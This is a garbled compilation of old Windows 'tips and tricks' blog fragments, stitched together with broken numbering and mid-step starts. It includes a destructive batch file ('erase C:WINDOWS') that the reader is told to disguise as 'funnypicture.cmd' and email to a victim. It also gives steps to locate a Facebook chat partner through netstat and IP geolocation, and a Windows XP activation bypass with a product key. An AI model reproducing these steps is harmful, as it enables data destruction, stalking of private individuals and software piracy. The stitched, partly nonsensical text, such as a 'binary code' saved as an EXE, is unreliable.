Why OpenDNS is good ? Your domain resolution request to OpenDNS is executed from the nearest physical location and the address are also cached at their end. Therefore you notice faster internet browsing.

Second OpenDNS would auto-correct misspelled domain names [or typos]. For instance, if you type www.gooogle.com by mistake, you'll be redirected to www.google.com without any interventation. note: you can replace ‘OMENA PENNE.mp3 with file Name of your choice and .mp3 with other extension.

In the Search Results you got to check out the results that starts with “Index of/” in the title. This technique allows you to easily pull up web folders with direct download links. it will look the same as if you were logged into a ftp URL. I’m sure you can be pretty flexible on how you type that in, as long as you include “index of/”. it’s not perfect but it has worked for me on a few occasions.

3. Rename the file to: ‘mmcstore.txt’
4. The file will now open in notepad
5. U will get your password written in the notepad file

Note #1: I think only few s60 phones have microSD slots. so you got to get a MMC adapter (costs around Rs.50). fit your microSD card in it and insert the MMC in your phone.

Note #2: If you Just want to format your card (without recovery of data), then just get a microSD card reader and format it.

How do WE find someone’s IP address on facebook? – Tracing facebook user

First you got to find out the IP address of that User.

To Do so we will be using “netstat” command in windows. If you want to know the IP address of a specific person on facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).

note: before trying this make sure you close all the other tabs in your browser. and only facebook is open. also if possible delete all the history and cache from your browser.

When command prompt opens Type the following command and hit Enter.

netstat -an

And you will get all established connections IP addresses there. Note down all the suspicious IP’s

The Next Step is to Trace that user using his IP address.

To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.

It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you.

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.

Onto the trick. Follow the directions carefully.

1- Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000

2- Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).

3- To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:

4- Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.

5- DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.

6- Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased.

Caution: This is a virus that can do alot of damage and sometimes cause the victim to rebuy Windows XP/Linux. Do NOT just use this because you are mad at a friend. I am in no way responible for anything you do

...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!

3) go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can dl all the updates without activating, and the Genuine Microsoft Validation thingy won't bug you no more!!

Lock a folder in windows XP without any software

1. Make a Folder in C drive rename it as "abc" without quotes.
2. Now open Command Prompt from Start Menu.
3. Type "attrib +s +h C:\abc" without quotes and press enter.
4. This command will Make your folder invisble and it can not be seen even in hidden files and folders
5. To make it visible again type "attrib -s -h C:\abc"
6. You can lock any other folder also by changing the location C:\abc to address of your folder.

Tips to recover scratched DVD’s

1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8′s.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.

For users facing with problem of slow copying, reading or accessing speed when connecting to and using the external USB hard disk drives or USB flash drives or other USB storage devices, Windows allows the externally connected removable disk storage devices via SCSI, USB, IEEE 1394 Firewire, eSATA interface to be optimized for performance (enable and turn on disk write caching) to improve access and write speed to and from the drive.

To optimize a storage drive for performance, follow these steps (based on Windows 7, other Windows OSes, such as Windows XP or Windows Vista has about the same procedure):

1. Click on Start button, and go to Control Panel.
2. Click on System and Security category, and then Device Manager link.
4. Click Yes if User Account Control (UAC) dialog prompts.
5. Expand the Disk Drive tree.
6. Right click on the USB storage disk drive to improve its performance, and select Properties.
7. Go to Policies tab.
8. Select the radio button for Better performance or Optimize for performance.
9. Click OK.

The external drive is now write-caching enabled. Thus, user must use the Safely Remove Hardware notification icon to disconnect the drive safely prior to remove the device in order to avoid data loss.

• Create a shutdown shortcut on your desktop. Right click on the desktop, choose New Shortcut and type shutdown -s -t 00 in the area where you are asked to specify the location of the program file. Now you can just double click this icon to turn off the computer. The best location would be your quick launch bar.
